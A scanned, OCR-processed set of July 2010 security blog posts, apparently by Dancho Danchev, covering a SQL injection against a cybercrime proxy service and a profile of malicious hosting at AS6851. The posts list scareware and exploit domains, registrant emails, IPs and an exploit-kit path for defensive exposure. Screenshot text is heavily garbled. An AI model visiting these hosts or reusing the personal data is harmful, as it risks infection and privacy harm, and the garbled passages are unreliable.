11. 
12, 

13. 

14 


6.7 July 


6.7.1 Summarizing Zero Day’s Posts for June (2010-07-05 21:35) 


Zero Dai 
Byer Neveine ¢ y National Geographic 
has gone Google. 


Home | News & Blogs 
ZDNet Must Read 


Googler releases Windows zero-day exploit, Microsoft unimpressed 


abdity, which is due to of hep:// URIs may allow 3 remote 


Blogger Info Adobe plugs security holes in PDF Reader, 
Ryan Naraine Acrobat Get it the way you want it 


Dasxho Danchey Adobe today shoped a crtxal Reader/Acrobat patch to cover a total of 
e 17 documented vulnerabaéities that expose Windows, Mac and UNIX 
users to maboows hacker attacks 
About Zero Dey ; 
staying ontep ofthe Defenders of the faith (Tavis acted responsibly) 
latest in  2Dtet's White Paper Membership 


software/hardware Lurene Grenier: Tavs Ormandy has protected hegh-value targets By aes 
and updates fromm Wihet: 
security research refumng to allow Mxroscf an unreasonable tnebne for patcheng 


vulnerabatves iF ZDNet's Must-Read News Alerts: 
threats and computer Researchers find 12 zero day flaws, targeting 5 ond Th ced hin 
attacks r 
web malware exploitation kits 

Vendor HotSpot 
H toh Ir on Securty researchers from TEMTRI-Securty, have found 12 zero day flaws 

ere to help you targeting S of the mos MOA wed Malware explogabon hits such 34 Be a fan on Facebook 
with your Neon, Eleomore, Liberty, Lucky and the Yes 


Follow us on Twitter 


From prediction to prophecy: The 2010 threat Watch us on YouTube 
landscape 


ssued 3 report outhreng our predxtions for 
© Now that were medway through 
r, Ive decided to look back at those 


The EFF releases new HTTPS Everywhere Firefox 


Readthe DouMertor extension 
blog now 


The Elextrorec Fronber Foundation, m a cooperation with the Tor Project. 


The following is a brief summary of all of my posts at [1]ZDNet’s Zero Day for June, 2010. You 
[2]can also go through [3]previous summaries, as well as subscribe to my [4]personal RSS 


feed, [5]Zero Day’s main feed, or follow me on Twitter: 
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Recommended reading: 


¢ [6]The security and privacy ramifications of AT &T’s iLeak 
¢ [7]The EFF releases new HTTPS Everywhere Firefox extension 


¢ [8]Researchers find 12 zero day flaws, targeting 5 web malware exploitation kits 


01. [9]Malware Watch: Free Mac OS X screensavers bundled with spyware 

02. [10]Protection tips for the upcoming FIFA World Cup themed cybercrime campaigns 

03. [11]Malware Watch: Twitter password reset emails, IRS-themed crimeware, malicious 
PDFs, and fake YouTube pages 

04. [12]The security and privacy ramifications of AT &T’s iLeak 

05. [13]Malware Watch: Adobe zero day attack, malicious FIFA-themed spam, exploit serving 
Virus Alerts 

06. [14]Malware Watch: Skype exploit, Skype-themed malicious spam campaigns detected 
07. [15]The EFF releases new HTTPS Everywhere Firefox extension 

08. [16]Researchers find 12 zero day flaws, targeting 5 web malware exploitation kits 


This post has been reproduced from [17]Dancho Danchev’s blog. Follow him 
[18]on Twitter. 


. http: //blogs.zdnet.com/securit 
. http: //ddanchev. blogspot .com/2010/05/summarizing-zero-days-posts-for-may.html 


ttp://ddanchev. blogspot .com/2010/04/summarizing-zero-days-posts-for-april.htm 


. http: //feeds.feedburner.com/zdnet/securit 


1 

2 

3 

4. http: //www.zdnet .com/topics/dancho+danchev?o=1&mode=rssktag=mantle_skin; content 

5 

6. http://www. zdnet .com/blog/security/the-security-and-privacy-ramifications-of-at-ts-ileak/6649 
7 


. http: //www.zdnet .com/blog/security/the-eff-releases-new-https-everywhere-f irefox-extension/6738 


8. http: //www.zdnet .com/blog/security/researchers-find-12-zero-day-flaws-targeting-5-web-malware-exploitatio 


kits/6752 


] 
9. http: //www.zdnet .com/blog/security/malware-watch-free-mac-os-x-screensavers-bundled-with-spyware/6560 


10. http://www.zdnet .com/blog/security/protection-tips-for-the-upcoming-fifa-world-cup-themed-cybercrime-ca 


ipaigns/6610 


11. http://www.zdnet .com/blog/security/malware-watch-twitter-password-reset-emails-irs-themed-crimeware-ma 


icious-pdfs-and-fake-youtube-pages/6636 


12. http://www.zdnet.com/blog/security/the-security-and-privacy-ramifications-of-at-ts-ileak/6649 


13. bttp://www.zdnet.com/blog/security/malware-watch-adobe-zero-day-attack-malicious-fifa-themed-spam-explo 


3 
it-serving-virus-alerts/6670 
4 


14. http://www.zdnet .com/blog/security/malware-watch-skype-exploit-skype-themed-malicious-spam-campaigns-de 


ected/6716 


15. http://www.zdnet.com/blog/security/the-eff-releases—new-https- everywhere-firefox-extension/6738 


16. http://www.zdnet .com/blog/security/researchers-find-12-zero-day-flaws-targeting-5-web-malware-exploitat 


ion-kits/6752 


17. http://ddanchev.blogspot.com/ 


18. 
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6.7.2 Cybercriminals SQL Inject Cybercrime-friendly Proxies Service 
(2010-07-13 23:00) 


Checking proxy....done 
Operation: get proxy #17676433 completed 


.pacbell.net 
Proxy IP:PORT : 138:28914 
comet to <liphowrd 


SORBS blacklist: no 


[close] 


Cybercrime ecosystem irony, at its best. Why the irony? Because the cybercrime-friendly 
proxies service TOS explicitly states that its users cannot launch XSS/SQL injection attacks 
through it. 


A relatively low profile cybercriminal has managed to exploit a remote SQL injection within a 
popular proxies service, offering access to compromised hosts across the globe for any kind of 
malicious activities. Based on the video released, he was able to access everyone’s password 
as MD5 hash, next to the emulating of the users of the service, using a trivial flaw in the 
online.cgi script. 


Although his intentions, based on the note left in a readme.txt file featured in the video, 
was to allow others to use the paid service freely, the potential for undermining the OPSEC of 
cybercriminals using the service is enormous, as it not only logs their financial transactions, 
keeps records of their IPs, but most interestingly, allows the "manual feeding" of proxy lists 
(compromised and freely accessible hosts) within the database. 
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o_O SIOIXI biisem: | © 
hi33mi! @ Your proxy IP: 71 
2h:28m: 


proxy details 


ripémi comcast.net 

. ; “=f Country: United States 
ee optoniine.net BPS2S: | City: Battle Creek 
Status: online State: Michigan [MI] ‘ 

5 Connect type: networ 

Country: [US] United States Speed: i” - 

; ; Online: OOh:34m 
2 esis 15P: Comeast Cable 
State: NY Proxy ping time: 1&6ms 
Speed: 1s @ network ap Gani arrint ae aat a 

pxa 2600.xpsp_sp2_rtm.040803-2156 (Service Pack 4! 

Uptime: 22h:36m:22s 
IP:PORT \ 721045 copy to clipboard 


Proxy ID; #894080 
[close] 


The service itself, has been in operation since 2004, operating under different brands, with 
prices starting from $20 to $90 for access to 150, and 1500 hosts on a monthly basis. Some 
interesting facts from a threat intell/social network analysis perspective, including screenshots 
(on purposely blurred in order to prevent the ruining of important OSINT sources) 
of the service obtained from its help file. 


¢ The gang/hacking/script kiddies team operates different business operations online 


¢ They maintain a traffic purchasing program monetizing traffic through [1]cybercrime- 
friendly search engines 


Whether they are lazy, or just don’t care, 4 currently active adult web sites share the same 
infrastructure as the service itself 


Although the original owners are Russian, they appear to be franchising since once of 
their brands is offering their services in Indonesian, including a banner for what looks like 
a Indonesian security conference. 


One of the Indonesian franchisers is known to have been offering root accounts and shells 
at compromised servers for sale, back in 2007 


Hello Date: 21/10/2008 14:22:41 
There are 2641 proxies online at this time Next pay date: 17/11/2008 09;10:16 


Proxy Search | List Proxys | 24h Proxys List | Account Settings | PHelp Settings | Billing | Check Your IP 
Daily & Hourly Socks Stats 


[Tanff; Daily 30 | Account; ACTIVE] 


Search proxy database by every Get full proxy list, sorted by every Account info. You can change 
parameter; Country, State, Host parameter; Country, State, Host, password, e-mail, tariff plan, ete. 
name, City or select proxy from City, Speed, Online time, Connect 

structured list. type 
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EE A-aaaaaaaaaaaaaaallerter 1p mask, e.g, 80.*.132.11, 173.90.*.*, 70,221.15.%, .] 
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by Country: [| Center needed countries, @.g, Italy,France,Portugal, ...] You can use * 
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BawtHo: 1, Nocne onnatel yepe3 webmoney, ana ycnewHora 3aBEPlWeEHhA TDaH3akUnn, 
Bbl FOMKHbI BEPHYTbCA B AAMHMHKY HA%HKaB HA KHONKY BepHyTbcA Ha CaMT Ha 
cTpaHnye onnatel webmoney, 4nn nogoxgas 10 ceKkyHa, NnoKa Bac 
ABTOMATMYECKM CDBAMPeKTHT CO CTPAHHMLb! ONNAaTb! OGPatHo B aAMHHKY. 
Ecnv 3Toro He NpoMsowno, AeHbrH He GyAyT aBTOMATHYeCKM 384MCNEHbI Ha 
BalW AKKAYHT, 2 BAWAa TPAaH3aKUMA GyfZeT BHCeTb B CNMCKE TDAH3aKUMM CO 
CTAaTYCOM "He 3aBePWeHHAaA’, NPOCTO HaAXMMTe HA CTATYC M TPAH3saKLMA 
3aBEPWHTCA, 


2. Nokanyiicta He nepeywncnaite AeHbIV Ha Hal KOweNbKM Ha Npamyw 
wiv Ball akKayHT He GyfeT aKTHBMpOBaH aBTOMaTHuecKs ! 


Please don't send money directly to our webmoney or e-gold accounts or 
you account will not be activated ! 


3, Using _ payment method you can pay by E-Gold with low 
commission fee, also using this method you can pay by: 
USD RuPay, USD Bets, e-Bullion e-Currency, e-Bullion Gold, WMR, \WMZ, 
WME, WMU, WMY, USD e-gold, RUR Yandex, WMB, UAH imoney, Pecunix USD, 
PTerr, RUR INOCard, InterBill RUR, MoneyMail RUR 


Payment: Sum total: Discount: 
For 3U days ™_ by tariff: PerUse 1 $10 $0 
add payment for ($10,00/mon) 
Pay by Webmoney | Pay by E-gold bo J \ Pay using 


Pay by Liberty Reserve ™ 


via Webmoney ($10.00) GO >> 

r via E-gold ($10.00 *) GO >> 

ja RoboxChange ($10.00) GO >> 
Liberty Reserve (£10.00 **) GO >> 


* 175% egold exchange fee will be added to your egold payment 
** 179) lihertu reserve exchanne fee will he added tn your mnaument 


For years, compromised malware hosts has been widely abused for anything, from direct 
spamming, to hosting spam/phishing and malware campaigns, but most importantly - to 
engineer cyber warfare tensions by directly forwarding the responsibility for the malicious 
actions of the cybercriminal/cyber spy to the host/network/country in question. 


Not only do these tactics undermine the currently implemented data retention regula- 
tions - how can you data retain something from a compromised ecosystem that keeps no logs 
- but also, they offer a safe heaven for the execution of each and every cybercriminal practice 
there is. 


Related posts: 


[2]Should a targeted country strike back at the cyber attackers? 
[3]Malware Infected Hosts as Stepping Stones 
[4]The Cost of Anonymizing a Cybercriminal’s Internet Activities 
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[5]The Cost of Anonymizing a Cybercriminal’s Internet Activities - Part Two 


This post has been reproduced from [6]Dancho Danchev’s blog. Follow him 
[7]Jon Twitter. 


. http://www.zdnet .com/blog/security/cybercriminals-promoting-malware-friendly-search-engines/3333 


. http://www. zdnet .com/blog/security/should-a-targeted-country-strike-back-at-the-cyber-attackers/6194 


. http: //ddanchev. blogspot .com/2008/02/malware-infected-hosts-as-stepping .htm 


1 
2 
3 
4. http: //ddanchev. blogspot .com/2008/10/cost-of-anonymizing- cybercriminals. htm 
5 
6 
7 


. http: //ddanchev. blogspot .com/2009/02/cost-of-anonymizing-cybercriminals.htm 


. http: //ddanchev. blogspot .com/ 


. http: //twitter.com/danchodanche 


6.7.3 Exploits, Malware, and Scareware Courtesy of AS6851, BKCNET, Sagade Ltd. 
(2010-07-14 19:54) 


@ ants + 95%" seas" 


72% of afl spyware 15 Not detected by the major And-weus programs. Orly 
re | 2 purposely Dull Spyware removal tool Such as Antivirus ¢ Can! 
' ’ 


W Antivirus + features: 


© Spyware removal - detects and removes Spyware programs ant 
Yojan horses stated on your PC 

© Homepage Mentor Toot - browser Hyachers Delorping to the farcry 
Of Spyware and adware, are Capadie of taking Control over your 
homepage and oer torte papes. and set an unénown weosie a5 
four homepage 

© System cleanup - ebrrenates THe Yaces of pour system achvbes 

© Disc Cleanup - securely Cent oys afl he data on your old hard Ga 

© Quarantine . The infected tes Mat Cannot be fed of Celeted are 
fhoved 19 2 QuBTEMENE fle afd rsptayed On He Quarantine pare 
Ara eus 

© User trendy Wirard Mode - he Quick Scan Wicard will help you run 
2 scan im the bask scan modes 

© Aamorun Tool - ¢ you want to know what applicatons run 
BAT ICally ON pour Byte ater Windows boots. 

@ Open Ports Tool - without 3 protectve applicaton. your system Is 
Getenseless and becomes Maghty wineratie to Trojan programs. 

© Many other features 


Total Gownioacs 991600 


Last uocete Wednesday, July 14, 2090 


Total rus records 728674 Rems 


© bows YR toca ig ens Ed — 8 
Pe Peay rey fey rey 77 


TRUE LIFE STORIES: 3 Is my PC infected with SpyWare? 


© Steve J. of New York had his so®ware project ha ae receive 0 lerpe quently of SVM fmnectcted 
acvertsemerts | 
Stolen rough 2 Doyen Mist got mts hes Comouter pa 
Brough some intemet site. Steve ts stil suffering — Your PC is runeing extremely stow? - 
G You are pestered by those hoeritte popup ads? 
from a strong depression. o Your cae 
@ Jason W was fred because he has been visting 


Q New icons appes! on your Gesitog? 
some probibted internet ses torn an ofice © Do you pet toolbars in your Browser Mat you Goat want? 


Computer. bis Doss opened the wee Browsers G Do pow downioad any music Mes for the Intemet? 
history nd Sow 38 he shes Jason hes been 0 Do you Gownboad and icstat tree sofware N cen De intemer? 
visaing Jasen is sa © Do you use any P2P Me exchange systems (P2P) - tor example 
@ Thomas S. tost his family over Ns passion for Utoerent, GitTorrent, Karaa eDonkey AudioGatary and Morpheus? 
teen sex sites His wife tamed Me computer on 
aire do ateos Gey he it you answered YES to any of these questions, there is 
ae 2 95% chance that your computer is already infectec with 


Grad K of Castenia had his hard deve formated = gavwvare. KEEP YOUR SECURITY AND PRIVACY! 
by Some mystenous program Last thins he 


visted before Mat was an Mega pomo sae After 
that Brad's parents Geckded to send tem to * SCAM VOIR PC FOR FREE 
Miatary Schoo instead of Stanford . 


4B cansacmn cueaaree: maa. 


Never trust an AS whose abuse-mailbox is using a Gmail account (piotrek89@gmail.com), and 
in particular one that you’ve come across to during several malware campaigns over the past 
couple of month. It’s [1]AS6851, BKCNET "SIA" IZZI I’m referring to, also Known as Sagade Ltd. 
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Let’s dissect the currently ongoing malicious activity at that Latvian based AS, expose the 
exploit/malware/crimeware/scareware serving domain portfolios, sample some of the currently 
active binaries and emphasize on the hijacking of Google/Yahoo and Bing search engines, as 
well as take a brief retrospective of AS6851’s activities profiled over the past couple of months. 


What’s so special about AS6851 anyway? It’s the numerous times in which the AS popped-up 
in previously profiled campaigns (see related posts at the bottom of the post), next to a pretty 
interesting Koobface gang connection. [2]An excerpt from a previous post: 


"What’s so special about [3JAS6851, BKCNET "SIA" IZZI anyway? _ It’s the Koobface 
gang connection in the face of urodinam.net, which is also hosted within AS6851, currently 
responding to 91.188.59.10. More details on urodinam.net: 


¢ [4]Koobface Botnet’s Scareware Business Model 


¢ [5]Koobface Botnet’s Scareware Business Model - Part Two 


Moreover, on the exact same IP where Koobface gang’s urodinam.net is parked, 
we also have the currently active Izabslwvn538n4i5tcjl.com - Email: michaelty- 
coon@gmail.com, serving client side exploits using the Yes Malware Exploitation kit - 
91.188.59.10 /temp/cache/PDF.php; admin panel at: I1zabslwvn538n4i5tcjl.com 
/temp/admin/index.php 


The same michaeltycoon@gmail.com used to register 1zabslwvn538n4i5tcjl.com, 
was also profiled in the "[6]Diverse Portfolio of Scareware/Blackhat SEO Redirectors 
Courtesy of the Koobface Gang" assessment." 


Related data on AS6851, BKCNET/Sagade Ltd.: 
netname: ATECH-SAGADE 

descr: Sagade Ltd. 

descr: Latvia, Rezekne, Darzu 21 

descr: +371 20034981 

remarks: abuse-mailbox: piotrek89@gmail.com 
country: LV 

admin-c: JS1449-RIPE 

tech-c: JS1449-RIPE 

status: ASSIGNED PA 

mnt-by: AS6851-MNT 

source: RIPE # Filtered 

person: Juris Sahurovs 

remarks: Sagade Ltd. 

address: Latvia, Rezekne, Darzu 21 

phone: +371 20034981 

abuse-mailbox: piotrek89@gmail.com 

nic-hdl: JS1449-RIPE 

mnt-by: ATECH-MNT 

source: RIPE # Filtered 


AS6851 advertises 15 prefixes: 
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* 62.84.0.0/19 
62.84.22.0/23 
84.38.128.0/20 
85.234.160.0/19 
91.123.64.0/20 
91.188.32.0/19 
91.188.41.0/24 
91.188.44.0/23 
91.188.46.0/24 
91.188.48.0/23 
91.188.50.0/24 
91.188.52.0/23 
91.188.56.0/24 
109.110.0.0/19 
195.244.128.0/20 


Uplink courtesy of: 
AS6747, LATTELEKOM Lattelekom 
AS5518, TELIALATVIJA Telia Latvija SIA 


Currently active exploits/malware/scareware serving domain portfolios within AS6851: 
Parked at/responding to 85.234.190.15 are: 
anrio.in - Email: Ometovgordey@mail.com 
brayx.in - Email: NikitasZoya@mail.com 
broyx.in - Email: NikitasZoya@mail.com 
brusd.in - Email: LomaevaTatyana@mail.com 
butuo.in - Email: erofeevalexey77@gmail.com 
butyx.in - Email: NikitasZoya@mail.com 
cogoo.in - Email: SamatovNail@mail.com 
conyx.in - Email: NikitasZoya@mail.com 
eboyx.in - Email: NikitasZoya@mail.com 
ederm.in - Email: Evenkolvan@mail.com 
edois.in - Email: Evenkolvan@mail.com 

foryx.in - Email: NikitasZoya@mail.com 

liuyx.in - Email: NikitasZoya@mail.com 
moosd.in - Email: VasilevaSvetlana@mail.com 
oserr.in - Email: skripnikkseniya@live.com 
ossce.in - Email: skripnikkseniya@live.com 
ostom.in - Email: skripnikkseniya@live.com 
purnv.in - Email: BajenovOleg@mail.com 
ragew.in - Email: vednerovasvetlana@gmail.com 
relsd.in - Email: VasilevaSvetlana@mail.com 
retnv.in - Email: BajenovOleg@mail.com 

sdali.in - Email: VasilevaSvetlana@mail.com 
seedw.in - Email: vednerovasvetlana@gmail.com 
shkey.in - Email: FirulevAndrey@mail.com 
spkey.in - Email: FirulevAndrey@mail.com 
thynv.in - Email: BajenovOleg@mail.com 
uitem.in - Email: lvanovEvgeny@mail.com 
wakey.in - Email: FirulevAndrey@mail.com 


3526 


yxial.in - Email: GaevAlexandr@mail.com 


arrie.in 
balsd.in 
barui.in 
bkpuo.in 
bleui.in 


butui.in 


a 


cated.in 


mie 


cedhw.in 


Co 


cirui.in 


Qo 
cn 


clrio.in 


BRP sess ZRS?Z 
Oo 


corie.in 
curie.in 
denny.in 
eagoo.,in 
ecrio.in 
edbal.in 
edban.in 
eéderc.in 
elrio.in 


epria.in 


~J 
co 


~J 
oO 
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Parked at/responding to 85.234.190.4 are: 
anrio.in - Email: Ometovgordey@mail.com 
antsd.in - Email: lvanovEvgeny@mail.com 
appsd.in - Email: lvanovEvgeny@mail.com 
arsdh.in - Email: shadrenkovavanda@mail.com 
barui.in - Email: RijovAlexandr@mail.com 
bkpuo.in - Email: erofeevalexey77@gmail.com 
bleui.in - Email: RijovAlexandr@mail.com 
brayx.in - Email: NikitasZoya@mail.com 
broyx.in - Email: NikitasZoya@mail.com 
brusd.in - Email: LomaevaTatyana@mail.com 


3527 


bryhw.in - Email: matatovayanna@mail.com 
butui.in - Email: RijovAlexandr@mail.com 
butuo.in - Email: erofeevalexey77@gmail.com 
butyx.in - Email: NikitasZoya@mail.com 
cirui.in - Email: RijovAlexandr@mail.com 
cogoo.in - Email: RijovAlexandr@mail.com 
conuo.in - Email: erofeevalexey77@gmail.com 
conyx.in - Email: NikitasZoya@mail.com 
cusnv.in - Email: SimakovSergey@mail.com 
czkey.in - Email: ZaharcevSergey@mail.com 
degoo.in - Email: SamatovNail@mail.com 
dugoo.in - Email: SamatovNail@mail.com 
ecrio.in - Email: Ometovgordey@mail.com 
ectuo.in - Email: erofeevalexey77@gmail.com 
ederm.in - Email: Evenkolvan@mail.com 
edger.in - Email: Evenkolvan@mail.com 
edimp.in - Email: Evenkolvan@mail.com 
edois.in - Email: Evenkolvan@mail.com 
elrio.in - Email: Ometovgordey@mail.com 
enguo.in - Email: erofeevalexey77@gmail.com 
eqrio.in - Email: Ometovgordey@mail.com 
fibnv.in - Email: SimakovSergey@mail.com 
glouo.in - Email: erofeevalexey77@gmail.com 
habsd.in - Email: LomaevaTatyana@mail.com 
hecuo.in - Email: erofeevalexey77@gmail.com 
hekey.in - Email: ZaharcevSergey@mail.com 
hygos.in - Email: Hohlunovanika@live.com 
imbos.in - Email: Hohlunovanika@live.com 
intsd.in - Email: LomaevaTatyana@mail.com 
ionnv.in - Email: SimakovSergey@mail.com 
jamsd.in - Email: LomaevaTatyana@mail.com 
latuo.in - Email: erofeevalexey77@gmail.com 
linuo.in - Email: erofeevalexey77@gmail.com 
makey.in - Email: ZaharcevSergey@mail.com 
oscog.in - Email: Nigmatovaanastasia@hotmail.com 
oserr.in - Email: skripnikkseniya@live.com 
osmac.in - Email: skripnikkseniya@live.com 
osmot.in - Email: skripnikkseniya@live.com 
ospor.in - Email: skripnikkseniya@live.com 
ossce.in - Email: skripnikkseniya@live.com 
ossio.in - Email: skripnikkseniya@live.com 
ostab.in - Email: skripnikkseniya@live.com 
ostac.in - Email: skripnikkseniya@live.com 
ostio.in - Email: skripnikkseniya@live.com 
ouned.in - Email: PoleschukovaGalina@mail.com 
purnv.in - Email: BajenovOleg@mail.com 
pxdmx.in - Email: GaleevDjamil@mail.com 
rekey.in - Email: ZaharcevSergey@mail.com 
relsd.in - Email: VasilevaSvetlana@mail.com 
retnv.in - Email: BajenovOleg@mail.com 
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scoos.in - Email: Nigmatovaanastasia@hotmail.com 
sdali.in - Email: VasilevaSvetlana@mail.com 
sdome.in - Email: OsvyanikovaDarya@mail.com 
shkey.in - Email: FirulevAndrey@mail.com 

spkey.in - Email: FirulevAndrey@mail.com 

sydos.in - Email: Nigmatovaanastasia@hotmail.com 
thynv.in - Email: BajenovOleg@mail.com 

ugiyx.in - Email: UshakovAndrey@mail.com 

uirin.in - Email: UshakovAndrey@mail.com 

uisap.in - Email: UshakovAndrey@mail.com 
uitem.in - Email: lvanovEvgeny@mail.com 

uithi.in - Email: lvanovEvgeny@mail.com 

uityp.in - Email: lvanovEvgeny@mail.com 

uityr.in - Email: lvanovEvgeny@mail.com 

varyx.in - Email: GaevAlexandr@mail.com 

wakey.in - Email: FirulevAndrey@mail.com 

yokey.in - Email: FirulevAndrey@mail.com 

yxiac.in - Email: GaevAlexandr@mail.com 

yxial.in - Email: GaevAlexandr@mail.com 
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Parked at/responding to 91.188.60.225 are: 
abrie.in - Email: Bodunovanton@mail.com 
agros.in - Email: Hohlunovanika@live.com 
alldh.in - Email: bondyashovandrey@mail.com 
alodh.in - Email: radostovamariya@mail.com 
anrio.in - Email: Ometovgordey@mail.com 
antsd.in - Email: lvanovEvgeny@mail.com 
aoxtv.in - Email: AkulovSergey@mail.com 
appsd.in - Email: lvanovEvgeny@mail.com 
aquui.in - Email: RijovAlexandr@mail.com 
arrie.in - Email: Bodunovanton@mail.com 
arsdh.in - Email: shadrenkovavanda@mail.com 
balsd.in - Email: lVanovEvgeny@mail.com 
barui.in - Email: RijovAlexandr@mail.com 
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bikey.in - Email: ZaharcevSergey@mail.com 
bkpuo.in - Email: erofeevalexey77@gmail.com 
bleui.in - Email: RijovAlexandr@mail.com 
brayx.in - Email: NikitasZoya@mail.com 
broyx.in - Email: NikitasZoya@mail.com 
brusd.in - Email: LomaevaTatyana@mail.com 
bryhw.in - Email: matatovayanna@mail.com 
butui.in - Email: RijovAlexandr@mail.com 
butuo.in - Email: erofeevalexey77@gmail.com 
butyx.in - Email: NikitasZoya@mail.com 
cated.in - Email: PoleschukovaGalina@mail.com 
cedhw.in - Email: lopoushkoamariya@mail.com 
chrie.in - Email: Bodunovanton@mail.com 
chrio.in - Email: Ometovgordey@mail.com 
cirui.in - Email: RijovAlexandr@mail.com 
clrio.in - Email: Ometovgordey@mail.com 
cogoo.in - Email: SamatovNail@mail.com 
conuo.in - Email: erofeevalexey77@gmail.com 
conyx.in - Email: NikitasZoya@mail.com 
corie.in - Email: Bodunovanton@mail.com 
curie.in - Email: Bodunovanton@mail.com 
cusnv.in - Email: SimakovSergey@mail.com 
czkey.in - Email: ZaharcevSergey@mail.com 
degoo.in - Email: SamatovNail@mail.com 
dennv.in - Email: SimakovSergey@mail.com 
dugoo.in - Email: SamatovNail@mail.com 
eagoo.in - Email: SamatovNail@mail.com 
eboyx.in - Email: NikitasZoya@mail.com 
ecrio.in - Email: Ometovgordey@mail.co 
ectuo.in - Email: erofeevalexey77@gmail.com 
edbal.in - Email: VasilevOleg@mail.com 
edban.in - Email: VasilevOleg@mail.com 
ederc.in - Email: Evenkolvan@mail.com 
ederm.in - Email: Evenkolvan@mail.com 
edger.in - Email: Evenkolvan@mail.com 
edimp.in - Email: Evenkolvan@mail.com 
edois.in - Email: Evenkolvan@mail.com 
elrio.in - Email: Ometovgordey@mail.com 
enguo.in - Email: erofeevalexey77@gmail.com 
eprio.in - Email: Ometovgordey@mail.com 
eqrio.in - Email: Ometovgordey@mail.com 
esrie.in - Email: Bodunovanton@mail.com 
fakey.in - Email: ZaharcevSergey@mail.com 
fegoo.in - Email: SamatovNail@mail.com 
fibnv.in - Email: SimakovSergey@mail.com 
foryx.in - Email: NikitasZoya@mail.com 
franv.in - Email: SimakovSergey@mail.com 
fraos.in - Email: Hohlunovanika@live.com 
garie.in - Email: Bodunovanton@mail.com 
glouo.in - Email: erofeevalexey77@gmail.com 
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guinv.in - Email: SimakovSergey@mail.com 
habsd.in - Email: LomaevaTatyana@mail.com 
hecuo.in - Email: erofeevalexey77@gmail.com 
hekey.in - Email: ZaharcevSergey@mail.com 
humos.in - Email: Hohlunovanika@live.com 
hygos.in - Email: Hohlunovanika@live.com 
hyrie.in - Email: Bodunovanton@mail.com 
imbos.in - Email: Hohlunovanika@live.com 
intsd.in - Email: LomaevaTatyana@mail.com 
ionnv.in - Email: SimakovSergey@mail.com 
jamsd.in - Email: LomaevaTatyana@mail.com 
jobos.in - Email: Hohlunovanika@live.com 
kykey.in - Email: ZaharcevSergey@mail.com 
latuo.in - Email: erofeevalexey77@gmail.com 
leunv.in - Email: SimakovSergey@mail.com 
linuo.in - Email: erofeevalexey77@gmail.com 
liuyx.in - Email: NikitasZoya@mail.com 
makey.in - Email: ZaharcevSergey@mail.com 
moosd.in - Email: VasilevaSvetlana@mail.com 
naios.in - Email: Hohlunovanika@live.com 
nvenc.in - Email: BajenovOleg@mail.com 
oscog.in - Email: Nigmatovaanastasia@hotmail.com 
osenc.in - Email: Nigmatovaanastasia@hotmail.com 
oserr.in - Email: skripnikkseniya@live.com 
osmac.in - Email: skripnikkseniya@live.com 
osmot.in - Email: skripnikkseniya@live.com 
ospor.in - Email: skripnikkseniya@live.com 
ossce.in - Email: skripnikkseniya@live.com 
ossio.in - Email: skripnikkseniya@live.com 
ostab.in - Email: skripnikkseniya@live.com 
ostac.in - Email: skripnikkseniya@live.com 
ostio.in - Email: skripnikkseniya@live.com 
ostom.in - Email: skripnikkseniya@live.com 
ouned.in - Email: PoleschukovaGalina@mail.com 
purnv.in - Email: BajenovOleg@mail.com 
pxdmx.in - Email: GaleevDjamil@mail.com 
ragew.in - Email: vednerovasvetlana@gmail.com 
rekey.in - Email: ZaharcevSergey@mail.com 
relsd.in - Email: VasilevaSvetlana@mail.com 
retnv.in - Email: BajenovOleg@mail.com 
saled.in - Email: VasilevOleg@mail.com 

sated.in - Email: VasilevOleg@mail.com 
scoos.in - Email: Nigmatovaanastasia@hotmail.com 
sdali.in - Email: VasilevaSvetlana@mail.com 
sdall.in - Email: VasilevaSvetlana@mail.com 
sdayb.in - Email: OsvyanikovaDarya@mail.com 
sdaye.in - Email: OsvyanikovaDarya@mail.com 
sdayo.in - Email: OsvyanikovaDarya@mail.com 
sdene.in - Email: OsvyanikovaDarya@mail.com 
sdich.in - Email: OsvyanikovaDarya@mail.com 
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sdome.in - Email: OsvyanikovaDarya@mail.com 
seedw.in - Email: vednerovasvetlana@gmail.com 
shkey.in - Email: FirulevAndrey@mail.com 
smoed.in - Email: VasilevOleg@mail.com 
soted.in - Email: VasilevOleg@mail.com 
spios.in - Email: Nigmatovaanastasia@hotmail.com 
spkey.in - Email: FirulevAndrey@mail.com 
stteop.in - Email: fibra _appl@yahoo.com 
sunyx.in - Email: GaevAlexandr@mail.com 
sydos.in - Email: Nigmatovaanastasia@hotmail.com 
teaed.in - Email: VasilevOleg@mail.com 
thynv.in - Email: BajenovOleg@mail.com 
ugiyx.in - Email: GaevAlexandr@mail.com 
uinei.in - Email: UshakovAndrey@mail.com 
uinge.in - Email: UshakovAndrey@mail.com 
uiren.in - Email: UshakovAndrey@mail.com 
uirin.in - Email: UshakovAndrey@mail.com 
uisap.in - Email: UshakovAndrey@mail.com 
uisee.in - Email: UshakovAndrey@mail.com 
uisma.in - Email: lvanovEvgeny@mail.com 
uitem.in - Email: lvanovEvgeny@mail.com 
uithi.in - Email: lvanovEvgeny@mail.com 
uityp.in - Email: lvanovEvgeny@mail.com 
uityr.in - Email: lvanovEvgeny@mail.com 
varyx.in - Email: GaevAlexandr@mail.com 
veged.in - Email: VasilevOleg@mail.com 
wakey.in - Email: FirulevAndrey@mail.com 
whasd.in - Email: VasilevaSvetlana@mail.com 
wimed.in - Email: VasilevOleg@mail.com 
woonv.in - Email: BajenovOleg@mail.com 
yokey.in - Email: FirulevAndrey@mail.com 
yxiac.in - Email: GaevAlexandr@mail.com 
yxial.in - Email: GaevAlexandr@mail.com 
yxiam.in - Email: GaevAlexandr@mail.com 
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Parked at/responding to 91.188.60.3 are: 

Ocheckingyourtraffic.com - Email: FranciscoPGeorge@hotmail.com 
10checkingyourtraffic.com - Email: FranciscoPGeorge@hotmail.com 
20checkingyourtraffic.com - Email: FranciscoPGeorge@hotmail.com 
30checkingyourtraffic.com - Email: FranciscoPGeorge@hotmail.com 
40checkingyourtraffic.com - Email: FranciscoPGeorge@hotmail.com 
50checkingyourtraffic.com - Email: FranciscoPGeorge@hotmail.com 
60checkingyourtraffic.com - Email: FranciscoPGeorge@hotmail.com 
70checkingyourtraffic.com - Email: FranciscoPGeorge@hotmail.com 
80checkingyourtraffic.com - Email: FranciscoPGeorge@hotmail.com 
90checkingyourtraffic.com - Email: FranciscoPGeorge@hotmail.com 
av-scaner-onlinemachine.com - Email: gershatv07@gmail.com 
easy-ns-server.org - Email: russell1985@hotmail.com 
fast-scanerr-online.org - Email: roberson@hotmail.com 
fast-scanneronline.org - Email: roberson@hotmail.com 
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fastscanner-online.org - Email: roberson@hotmail.com 
fastscannerr-online.org - Email: roberson@hotmail.com 
